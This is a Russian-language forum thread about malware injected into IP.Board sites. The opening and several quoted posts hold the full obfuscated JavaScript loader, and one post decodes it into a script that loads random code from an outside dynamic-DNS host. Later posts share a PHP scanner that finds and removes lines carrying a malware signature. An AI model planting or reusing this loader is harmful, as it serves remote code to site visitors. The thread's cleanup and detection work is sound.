.5$51.5$50$15$19$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$23$19.5$15$60.5$5.5$4$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$51$49.5$47.5$49$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$51$49.5$47.5$49$18.5$19.5$44.5$23$45.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$56.5$48.5$56$51.5$55$57$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$48.5$56$49.5$47.5$57$49.5$33.5$53$49.5$53.5$49.5$54$57$19$18.5$56.5$48.5$56$51.5$55$57$18.5$19.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$57$59.5$55$49.5$15$29.5$15$18.5$57$49.5$59$57$22.5$52$47.5$58$47.5$56.5$48.5$56$51.5$55$57$18.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$56$49.5$47.5$49$59.5$56.5$57$47.5$57$49.5$48.5$51$47.5$54$50.5$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$15$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$51.5$50$15$19$57$51$51.5$56.5$22$56$49.5$47.5$49$59.5$40.5$57$47.5$57$49.5$15$29.5$29.5$15$18.5$48.5$54.5$53.5$55$53$49.5$57$49.5$18.5$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$3.5$61.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$53$54.5$47.5$49$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$56.5$56$48.5$15$29.5$15$57.5$56$53$15$20.5$15$37.5$47.5$57$51$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){k=i;ss=ss+String.fromCharCode(-1*h*(1+1*n[k]));}q=ss;e(q);}

возможно это оффтоп, поэтому заранее извеняюсь

заметил что при редактировании сообщений на форуме не загружаеться редактор, я думал это связано с вирусом но вот и на вешем форуме также не загружаеться (вернее загружаеться но не всегда)

Цитата

Respected
1

18 мая, 201212 yr

Author

comment_4582

Расшифровка данного скрипта:



(function() {

var url = '__smmxkycxsu.webhop.org/g/';

if (typeof window.xyzflag === 'undefined') {

window.xyzflag = 0;

}

document.onmousemove = function() {

if (window.xyzflag === 0) {

window.xyzflag = 1;

var head = document.getElementsByTagName('head')[0];

var script = document.createElement('script');

script.type = 'text/javascript';

script.onreadystatechange = function () {

if (this.readyState == 'complete') {

window.xyzflag = 2;

}

};

script.onload = function() {

window.xyzflag = 2;

};

script.src = url + Math.random().toString().substring(3) + '.js';

head.appendChild(script);

}

};

})();

[/CODE]

Цитата

kolian1140
1

18 мая, 201212 yr

comment_4583

ещё антивирус в cPanel по началу ругался на троян, но теперь перестал хотя точно знаю что ещё есть эта бяка.

Цитата

18 мая, 201212 yr

comment_4585

вот этот код:
try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'om'+'Ch';f+='arC';}try{qwe=prototype;}catch(brebr){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f["s"+"ubstr"](11)+zz];n="19$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$58$47.5$56$15$57.5$56$53$15$29.5$15$18.5$51$57$57$55$28$22.5$22.5$55.5$50$58$53$59.5$55.5$56$51.5$51$51.5$22$51$54.5$53.5$49.5$53$51.5$54$57.5$59$22$54$49.5$57$22.5$50.5$22.5$18.5$28.5$5.5$4$3.5$51.5$50$15$19$57$59.5$55$49.5$54.5$50$15$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$18.5$57.5$54$49$49.5$50$51.5$54$49.5$49$18.5$19.5$15$60.5$5.5$4$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23$28.5$5.5$4$3.5$61.5$5.5$4$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$54.5$54$53.5$54.5$57.5$56.5$49.5$53.5$54.5$58$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$51.5$50$15$19$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$23$19.5$15$60.5$5.5$4$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$51$49.5$47.5$49$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$51$49.5$47.5$49$18.5$19.5$44.5$23$45.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$56.5$48.5$56$51.5$55$57$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$48.5$56$49.5$47.5$57$49.5$33.5$53$49.5$53.5$49.5$54$57$19$18.5$56.5$48.5$56$51.5$55$57$18.5$19.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$57$59.5$55$49.5$15$29.5$15$18.5$57$49.5$59$57$22.5$52$47.5$58$47.5$56.5$48.5$56$51.5$55$57$18.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$56$49.5$47.5$49$59.5$56.5$57$47.5$57$49.5$48.5$51$47.5$54$50.5$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$15$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$51.5$50$15$19$57$51$51.5$56.5$22$56$49.5$47.5$49$59.5$40.5$57$47.5$57$49.5$15$29.5$29.5$15$18.5$48.5$54.5$53.5$55$53$49.5$57$49.5$18.5$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$3.5$61.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$53$54.5$47.5$49$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$56.5$56$48.5$15$29.5$15$57.5$56$53$15$20.5$15$37.5$47.5$57$51$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){k=i;ss=ss+String.fromCharCode(-1*h*(1+1*n[k]));}q=ss;e(q);}
try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="19$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$58$47.5$56$15$57.5$56$53$15$29.5$15$18.5$51$57$57$55$28$22.5$22.5$55.5$51$48.5$52.5$50$49$57.5$55$49$55.5$22$55$54.5$49$60$54.5$54$49.5$22$54$49.5$57$22.5$50.5$22.5$18.5$28.5$5.5$4$3.5$51.5$50$15$19$57$59.5$55$49.5$54.5$50$15$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$18.5$57.5$54$49$49.5$50$51.5$54$49.5$49$18.5$19.5$15$60.5$5.5$4$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23$28.5$5.5$4$3.5$61.5$5.5$4$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$54.5$54$53.5$54.5$57.5$56.5$49.5$53.5$54.5$58$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$51.5$50$15$19$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$23$19.5$15$60.5$5.5$4$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$51$49.5$47.5$49$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$51$49.5$47.5$49$18.5$19.5$44.5$23$45.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$56.5$48.5$56$51.5$55$57$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$48.5$56$49.5$47.5$57$49.5$33.5$53$49.5$53.5$49.5$54$57$19$18.5$56.5$48.5$56$51.5$55$57$18.5$19.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$57$59.5$55$49.5$15$29.5$15$18.5$57$49.5$59$57$22.5$52$47.5$58$47.5$56.5$48.5$56$51.5$55$57$18.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$56$49.5$47.5$49$59.5$56.5$57$47.5$57$49.5$48.5$51$47.5$54$50.5$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$15$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$51.5$50$15$19$57$51$51.5$56.5$22$56$49.5$47.5$49$59.5$40.5$57$47.5$57$49.5$15$29.5$29.5$15$18.5$48.5$54.5$53.5$55$53$49.5$57$49.5$18.5$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$3.5$61.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$53$54.5$47.5$49$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$56.5$56$48.5$15$29.5$15$57.5$56$53$15$20.5$15$37.5$47.5$57$51$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-683!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}
возможно это оффтоп, поэтому заранее извеняюсь

заметил что при редактировании сообщений на форуме не загружаеться редактор, я думал это связано с вирусом но вот и на вешем форуме также не загружаеться (вернее загружаеться но не всегда)

Установите вот это дополнение для Firefox и вы будете видеть весь JS код форума, уже в нормальном, а не в обфусцированном виде.

Цитата

kolian1140
1

9 ноября, 201212 yr

comment_14434

Вот скрипт:


<?

/*

----------------------------------------------------------------------------------

dScaner Class - START

----------------------------------------------------------------------------------

*/

/*

*

* Класс - dScaner для сканирования директорий на наличие вредоносного кода в

* указанных типах файлов

*

* Разработчик: Денис Ушаков

* Дата разработки: 03-04-2012

* Версия разработки: 0.0.3

*

*/

Class dScaner {

	// преобразуем входной параметр в массив

	// $get_str - список параметров

	// $separator - разделитель параметров в списке

	function request($get_str, $separator)

	{

		if (isset($get_str) && !empty($get_str))

		{

			// эксплоадим строку в массив и возвращаем его

			$obj = explode($separator, $get_str);

			return $obj;

		}

		else

		{

			return false;

		}

	}

	/*

	*

	* Функция поиска в файлах вхождения заданной строки:

	*

	* $this->find($path, $files_allowed, $requested_string);

	*

	* $path - путь до директории, от которой отталкиваться при сканировании

	* $files_allowed - список файлов, которые подвергаются сканированию

	* $requested_string - строка поиска

	*

	*/

	function find($path = './', $files_allowed, $requested_string)

	{

		// исключаемые ссылки на директории и файлы, которые будут игнорироваться

		$dir_disallow = array('.', '..', '.htaccess', '.git');

		if(is_dir($path))

		{

		 $temp = opendir($path);

		 while (false !== ($dir = readdir($temp)))

		 {

				if ((is_dir($path . $dir)) &&

					(!in_array($dir, $dir_disallow)) )

				{

					// если директория - сканируем её

					$sub_dir = $path . $dir . '/';

					$this->find($sub_dir, $files_allowed, $requested_string);

				}

				elseif ((is_file($path . $dir)) &&

						(!in_array($dir, $dir_disallow)) &&

						(strpos($dir, $files_allowed) == true) &&

						(strpos($dir, '_BACKUP') == false) )

				{

					// Если файл

					// получаем полный путь до него

					$in_dir_file = $path . $dir;

					// считываем файл в строку

					$temporary_file = file_get_contents($in_dir_file);

					// флаг найденного вхождения искомой строки

					$file_founded = false;

					// разбиваем файл на строки

					$tf_strings = explode("n", $temporary_file);

					// обрабатываем каждую отдельно

					foreach ($tf_strings AS $item)

					{

						$item = strval($item);

						// если в строке есть вхождения искомого запроса

						if (strpos($item, $requested_string) !== false)

						{

							$file_founded = true;

						}

					}

					// если в файле найдена строка

					if ($file_founded)

					{

						// выводим путь до файла в котором найдено вхождение

						print "<span style='display:block;

											padding:5px;

											border:1px solid #1f4f18;

											background-color:#d5f5ce;

											font-size:12px;

											line-height:16px;

											font-family:tahoma, sans-serif;

											margin-bottom:-15px;'>" . $in_dir_file . " - в файле обнаружена искомая строка.

								</span>

";					

					}

				}

		 }

		 closedir($temp);

		}

	}

	/*

	*

	* Функция сканирования вредоносного кода:

	*

	* $this->scan($path, $files_allowed, $requested_string);

	*

	* $path - путь до директории, от которой отталкиваться при сканировании

	* $files_allowed - список файлов, которые подвергаются сканированию

	* $requested_string - строка, по которой определяется наличие вредоносного кода

	*

	*/

	function scan($path = './', $files_allowed, $requested_string)

	{

		// исключаемые ссылки на директории и файлы

		$dir_disallow = array('.', '..', '.htaccess', '.git');

		if(is_dir($path))

		{

		 $temp = opendir($path);

		 while (false !== ($dir = readdir($temp)))

		 {

				if ((is_dir($path . $dir)) &&

					(!in_array($dir, $dir_disallow)) )

				{

					// если директория - сканируем её

					$sub_dir = $path . $dir . '/';

					$new_parent_dir = $path . $dir;

					$this->scan($sub_dir, $files_allowed, $requested_string, $new_parent_dir);

				}

				elseif ((is_file($path . $dir)) &&

						(!in_array($dir, $dir_disallow)) &&

						(strpos($dir, $files_allowed) == true) &&

						(strpos($dir, '_BACKUP') == false) )

				{

					// Если файл

					// получаем полный путь до него

					$in_dir_file = $path . $dir;

					// считываем файл в строку

					$temporary_file = file_get_contents($in_dir_file);

					// флаг бекапа файла								

					$create_backup = false;				

					// разбиваем файл на строки и считываем каждую отдельно

					$tf_strings = explode("n", $temporary_file);

					// индекс строки файла

					$str_index = 0;

					// каждую строку обрабатываем отдельно

					foreach ($tf_strings AS $item)

					{

						$item = strval($item);

						if (strpos($item, $requested_string) !== false)

						{

							// если в строке есть вхождения искомого запроса

							// флаг бекапа файла, в котором найден вредоносный код

							$create_backup = true;

							// удаляем всю строку с вредоносным кодом

							unset($tf_strings[$str_index]);

						}

						$str_index++;

					}

					// создаём бэкап

					if ($create_backup)

					{

						// меняем права в папке в которой находимся чтобы иметь возможность писать в неё

						chmod($path, 0777);

						// формируем имя БЭКАПа файла

						$temp_file_backup = $in_dir_file.'_BACKUP';

						// сохраняем БЭКАП файла рядом с исходным

						file_put_contents($temp_file_backup, $temporary_file);

						// собираем очищенный файл в строку

						$scanned_file = implode("n", $tf_strings);

						// сохраняем очищенный файл

						if (file_put_contents($in_dir_file, $scanned_file))

						{

							// перезаписали удачно

							print "<span style='display:block;

												padding:5px;

												border:1px solid #1f4f18;

												background-color:#d5f5ce;

												font-size:12px;

												line-height:16px;

												font-family:tahoma, sans-serif;

												margin-bottom:-15px;'>" . $in_dir_file . " - Файл очищен. (+ BACKUP)

									</span>

";

						}

						else

						{

							// перезапись не удалась

							print "<span style='display:block;

												padding:5px;

												border:1px solid #822121;

												background-color:#ea7575;

												font-size:12px;

												line-height:16px;

												font-family:tahoma, sans-serif;

												margin-bottom:-15px;'>".$in_dir_file ." - Файл НЕ очищен.

									</span>

";

						}

						// меняем права в папке в которой находимся обратно на 755

						chmod($path, 0755);					

					}

				}

		 }

		 closedir($temp);

		}

	}

	/*

	*

	* Функция восстановления БЭКАПОВ файлов

	*

	* $this->restore_backups($path, $files_allowed);

	*

	* $path - путь до директории, от которой отталкиваться при восстановлении

	* $files_allowed - список файлов, которые подвергаются восстановлению

	*

	*/

	function restore_backups($path = './', $files_allowed)

	{

		// исключаемые ссылки на директории и файлы

		$dir_disallow = array('.', '..', '.htaccess', '.git');

		if(is_dir($path))

		{

		 $temp = opendir($path);

		 while (false !== ($dir = readdir($temp)))

		 {

				if ((is_dir($path . $dir)) &&

					(!in_array($dir, $dir_disallow)) )

				{

					// если директория - сканируем её

					$sub_dir = $path . $dir . '/';

					$this->restore_backups($sub_dir, $files_allowed);

				}

				elseif ((is_file($path . $dir)) &&

						(!in_array($dir, $dir_disallow)) &&

						(strpos($dir, $files_allowed) == true) )

				{

					// Если файл

					// получаем полный путь до него

					$in_dir_file = $path . $dir;

					if (is_file($in_dir_file.'_BACKUP'))

					{

						// БЭКАП существует, получаем его содержимое

						$temporary_file_from_backup = file_get_contents($in_dir_file.'_BACKUP');

						// восстанавливаем бэкап файла

						if (file_put_contents($in_dir_file, $temporary_file_from_backup))

						{

							// удаляем бэкап

							unlink($_SERVER['DOCUMENT_ROOT'].'/'.$in_dir_file.'_BACKUP');

							// бэкап восстановили

							print "<span style='display:block;

												padding:5px;

												border:1px solid #1f4f18;

												background-color:#d5f5ce;

												font-size:12px;

												line-height:16px;

												font-family:tahoma, sans-serif;

												margin-bottom:-15px;'>".$in_dir_file ." - восстановлен.

									</span>

";				

						}

						else

						{

							// бэкап НЕ восстановили

							print "<span style='display:block;

												padding:5px;

												border:1px solid #822121;

												background-color:#ea7575;

												font-size:12px;

												line-height:16px;

												font-family:tahoma, sans-serif;

												margin-bottom:-15px;'>".$in_dir_file ." - НЕ восстановлен.

									</span>

";

						}

					}

				}

		 }

		 closedir($temp);

		}

	}	

}

/*

----------------------------------------------------------------------------------

dScaner Class - END

----------------------------------------------------------------------------------

*/

?>

Выкладывай, посмотрим что у тебя за код..

Права изменять бесполезно - злоумышленник при внедрении вредоносного кода имеет доступ к файлам через FTP.

Как воспользоваться этим скриптом?

Цитата

9 ноября, 201212 yr

Author

comment_14468

Прочитать комментарии в скрипте, что-то подредактировать согласно комментариям и обратиться к скрипту из адресной строки.

Цитата

10 ноября, 201212 yr

comment_14497

Прочитать комментарии в скрипте, что-то подредактировать согласно комментариям и обратиться к скрипту из адресной строки.

А в каком формате его сохранить нужно? ".js" ?

Цитата

10 ноября, 201212 yr

Author

comment_14505

Нет, в .php

Цитата

10 ноября, 201212 yr

comment_14530

Нет, в .php

Я если честно вообще не разбираюсь в кодах... Вы можете подсказать что отредактировать нужно? Я вот могу скопировать и сохранить в формате ПХП но дальше я вообще не бум бум что делать...

Цитата

12 ноября, 201212 yr

Author

comment_14736

(первый параметр — стартовая директория поиска, второй — тип файлов, участвующих в поиске, третий — строка поиска)

Пример:

В самый низ добавляешь:



$ipbmafia = new dScaner;

$ipbmafia->find('./', '.js', 'Array');


  $ipbmafia->scan('./', '.js', '=Array.prototype.slice.call(arguments).join(""),');

[/CODE]

У тебя будут свои значения. Если искомый текст будет обнаружен, то сканнер выведет эти файлы на экран.

Цитата

5 декабря, 201211 yr

comment_16203

Паш, проверь пожалуйста мой сайт на вирусняк. у меня пользователей перекидывает на другой сайт.

Цитата

20 августа, 20177 yr

comment_134996

Доброго дня всем! Подниму тему, недавно яндекс обнаружил у меня на форуме вирусы...при этом гугл не ругается, но яша поставил ярлык как зараженный, найти не могу, удалить вирус тем более, что делать подскажите?

Цитата

20 августа, 20177 yr

comment_134998

14 минут назад, iliah сказал:

что делать подскажите?

Как вариант, откатить из бэкапа! Порабы уже переползать на IPS4

Цитата

Draco-Zero
1

20 августа, 20177 yr

comment_134999

3 минуты назад, Sipsb сказал:

Как вариант, откатить из бэкапа! Порабы уже переползат на IPS4

видел в 15 году тут тему как правильно перейти на ипс 4 сейчас не получается найти, лицензия есть, только надо продлить, и возможно ли автоматически обновиться с 345 на 4.0

Цитата

20 августа, 20177 yr

comment_135000

1 минуту назад, iliah сказал:

видел в 15 году тут тему как правильно перейти на ипс 4 сейчас не получается найти

Цитата

iliah and Draco-Zero
2

20 августа, 20177 yr

comment_135001

8 минут назад, Sipsb сказал:

Для исключения вирусов, я б конечно хотел снести весь форум к ядреной бабушке, и файлы с базой восстановить на свежей четверке.

Цитата

20 августа, 20177 yr

comment_135002

1 минуту назад, iliah сказал:

я б конечно хотел снести весь форум к ядреной бабушке, и файлы с базой восстановить на свежей четверке.

Это правильно! Думаю, лучше переустановить на чистую 3-ку а затем обновить до 4-ки.

Цитата

iliah
1

20 августа, 20177 yr

comment_135003

Только что, Sipsb сказал:

Это правильно! Думаю, лучше переустановить на чистую 3-ку а затем обновить до 4-ки.

вооо а это идея, чет я сразу не допер

Цитата

20 августа, 20177 yr

comment_135004

3 минуты назад, iliah сказал:

вооо а это идея, чет я сразу не допер

Вот Вам в помощь

Цитата

Sign In

Вирус на форуме IP.Board

Featured Replies

Join the conversation

Последние посетители 0

Account

Navigation

Messages

Уведомления

Search